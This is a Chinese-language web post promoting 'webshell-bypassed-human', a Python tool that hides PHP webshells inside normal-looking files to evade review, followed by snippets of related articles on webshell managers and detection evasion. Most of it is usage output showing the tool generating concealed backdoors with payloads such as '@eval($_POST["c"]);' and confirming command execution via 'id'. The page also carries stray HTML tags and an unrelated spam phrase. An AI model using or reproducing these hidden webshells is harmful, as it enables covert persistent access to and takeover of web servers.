<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    webshell生成(繞過)工具 -- webshell-bypassed-human

    VSole2022-07-19 06:24:26

    一、過人 webshell 的生成工具

    ? python hide_webshell.py
    usage: hide_webshell.py [-h] -pf PAYLOAD_FILE [--pro] [-wf WEBSHELL_FILE]
                            [--debug]
                            php
    hide_webshell.py: error: the following arguments are required: php, -pf/--payload_file
    

    將 payload 放在 -pf 所指定的路徑

    二、hide webshell

    python hide_webshell.py hide_webshell.py normal.php -pf payload.txt
    

    三、hide webshell pro

    python hide_webshell.py normal_pro.php -pf payload.txt --pro
    

    四、payload 示例

    system("echo \"hacked by Tr0y :)\"");
    @eval($_POST["c"]);
    

    五、完整示例

    # macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ?? [14:45:27]
    ? cat payload.txt
    system("echo \"hacked by Tr0y :)\"");%
    # macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ?? [14:45:28]
    ? p hide_webshell.py normal.php -pf payload.txt && php webshell_hidden.php
    [+] Hide webshell in normal mode
      [-] Get payload from payload.txt
          Payload is system("echo \"hacked by Tr0y :)\"");
      [-] Get php code from normal.php
    [!] Saved webshell as webshell_hidden.php
    [!] All done
    Bye :)
    hacked by Tr0y :)
    # macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ?? [14:45:31]
    ? p hide_webshell.py normal_pro.php -pf payload.txt --pro && php webshell_hidden.php
    [+] Hide webshell in pro mode
      [-] Get payload from payload.txt
          Payload is system("echo \"hacked by Tr0y :)\"");
      [-] Get php code from normal_pro.php
    [!] Saved webshell as webshell_hidden.php
    [!] All done
    Bye :)
    hacked by Tr0y :)
    # macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ?? [14:48:23]
    ? cat payload.txt
    @eval($_POST["c"]);%
    # macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ?? [14:48:24]
    ? p hide_webshell.py normal.php -pf payload.txt && php -r '$_POST["c"]="system(\"id\");"; require("webshell_hidden.php");'
    [+] Hide webshell in normal mode
      [-] Get payload from payload.txt
          Payload is @eval($_POST["c"]);
      [-] Get php code from normal.php
    [!] Saved webshell as webshell_hidden.php
    [!] All done
    Bye :)
    uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此處省略
    # macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ?? [14:48:26]
    ? p hide_webshell.py normal_pro.php -pf payload.txt --pro && php -r '$_POST["c"]="system(\"id\");"; require("webshell_hidden.php");'
    [+] Hide webshell in pro mode
      [-] Get payload from payload.txt
          Payload is @eval($_POST["c"]);
      [-] Get php code from normal_pro.php
    [!] Saved webshell as webshell_hidden.php
    [!] All done
    Bye :)
    uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此處省略
    

    六、下載地址

    https://github.com/Macr0phag3/webshell-bypassed-human

    payloadwebshell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Webshell檢測方法
    2022-01-04 10:33:05
    Webshell作為一種web后門,通常由攻擊者通過常見的Web網站漏洞,如sql注入、文件包含和上傳等,上傳到服務器,從而為攻擊者提供與服務器端進行交互的能力。
    工具短小精悍,生成的webshell能夠過常見殺軟,盡量減少了連接后交互的流量特征,具體payload發送方式均可自定義。由于個人精力有限,服務端暫時僅支持Java。
    payload 放在 -pf 所指定的路徑二、hide webshellpython hide_webshell.py hide_webshell.py normal.php -pf payload.txt. uid=502 gid=20 groups=20,12, ...此處省略
    利用場景僅支持ASP,WScript.Shell、Shell.Application組件被卸載;又或者支持ASP.NET,但是存在有某些安全防護軟件,在這兩種場景下可能無法執行命令、上線和提權等。0x01 中國菜刀中國菜刀中并沒有直接上線和shellcode加載功能,但是有一個自定義代碼執行,我們可以利用這個功能來獲取MSF會話。選擇對應Webshell -> As-Exploits -> 執行自定義Payload -> 執行ASP腳本上線。
    Webshell簡介webshell就是以asp、php、jsp或者cgi等網頁文件形式存在的一種代碼執行環境,主要用于網站管理、服務器管理、權限管理等操作。它的流量特征十分明顯,現如今的安全設備基本上都可以識別到菜刀的流量。現在的菜刀基本都是在安全教學中使用。
    0x00 前言常見webshell管理工具的分析記錄,著重在流量側。0x01 caidao1、配置使用菜刀是一款專業的網站管理軟件,用途廣泛,使用方便,小巧實用。支持動態腳本[如php/jsp/aspx/asp]的網站!新版antSword的ua也做了隨機變換。在內置的rot13編碼和解碼器下,數據會通過隨機變量傳遞給str_rot13函數,通過變換還原后再交給eval函數執行。
    主流webshell工具流量分析
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类